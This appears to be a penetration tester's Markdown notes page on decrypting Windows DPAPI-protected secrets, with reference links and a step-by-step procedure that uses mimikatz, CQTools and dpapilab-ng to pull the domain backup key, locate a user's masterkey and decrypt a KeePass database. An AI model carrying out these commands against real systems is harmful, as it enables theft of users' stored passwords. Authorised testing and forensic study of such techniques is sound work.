28 lines
1.7 KiB
Markdown
28 lines
1.7 KiB
Markdown
# DPAPI
|
|
|
|
* [Jarno Baselier](https://jarnobaselier-nl.translate.goog/crack-dpapi-met-cqure-cqtools/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=nui)
|
|
* [Insecurity's take](https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/#The_DPAPILAB-NG_Toolset)
|
|
* [tinyapps' replace and recover domian cached credentials](https://tinyapps.org/docs/domain-cached-credentials.html)
|
|
* [ired's reading dpapi encrypted secrets with mimikatz and c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++)
|
|
|
|
## Tools
|
|
|
|
* [tjldeneut's dpaping-lab](https://github.com/tijldeneut/dpapilab-ng.git)
|
|
* [BlackDiverX's unpacked cqtools]( https://github.com/BlackDiverX/cqtools)
|
|
* Use [CQTools](https://github.com/paulacqure/CQTools.git) with care, __CQMasterKeyAD.exe__ does not work correctly. It will drive you mad. Here is the workaround
|
|
Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
|
|
* Get the pvk backup key from the DC via mimikatz
|
|
* Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
|
|
* Get the encrypted blob
|
|
* Get the user's Masterkey under `C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\`
|
|
* Use dpapilab-ng's `keepassdec.py`
|
|
```sh
|
|
./keepassdec.py --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin
|
|
```
|
|
* Use the decrypted blob to
|
|
```sh
|
|
CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
|
|
```
|
|
* Open the `*.kdbx` file
|
|
|